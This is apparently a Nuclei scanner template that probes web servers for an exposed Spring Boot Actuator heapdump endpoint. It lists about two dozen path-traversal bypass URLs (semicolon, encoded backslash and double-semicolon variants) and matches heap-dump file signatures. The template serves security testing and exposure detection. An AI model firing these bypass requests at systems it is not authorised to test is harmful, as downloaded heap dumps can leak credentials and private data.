id: nginx_projeto_1_actuator2comtact

info:
  name: Spring Boot Actuator Heapdump Exposure (Traversal)
  author: Redflare-Cyber_ / Xand
  severity: medium
  description: Detects exposed Actuator heapdump endpoint using traversal bypass techniques.
  metadata:
    max-request: 30
  tags: springboot,actuator,exposure,traversal

http:
  - method: GET
    path:
      # traversal semicolon
      - "{{BaseURL}}/..;/heapdump"
      - "{{BaseURL}}/..;/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v5/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v4/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v3/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v2/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v1/actuator/heapdump"
      - "{{BaseURL}}/..;/api/actuator/heapdump"

      # traversal backslash encoded
      - "{{BaseURL}}/%5C../heapdump"
      - "{{BaseURL}}/%5C../actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v5/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v4/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v3/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v2/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v1/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/actuator/heapdump"

      # traversal double semicolon
      - "{{BaseURL}}/;;/heapdump"
      - "{{BaseURL}}/;;/actuator/heapdump"
      - "{{BaseURL}}/;;/api/v5/actuator/heapdump"
      - "{{BaseURL}}/;;/api/v4/actuator/heapdump"
      - "{{BaseURL}}/;;/api/v3/actuator/heapdump"
      - "{{BaseURL}}/;;/api/v2/actuator/heapdump"
      - "{{BaseURL}}/;;/api/v1/actuator/heapdump"
      - "{{BaseURL}}/;;/api/actuator/heapdump"

    stop-at-first-match: true
    max-size: 2097152

    matchers-condition: and
    matchers:
      - type: binary
        part: body
        condition: or
        binary:
          - "4a4156412050524f46494c45"    # JAVA PROFILE
          - "4850524f46"                  # HPROF
          - "1f8b080000000000"            # Gzip magic byte

      - type: status
        status:
          - 200
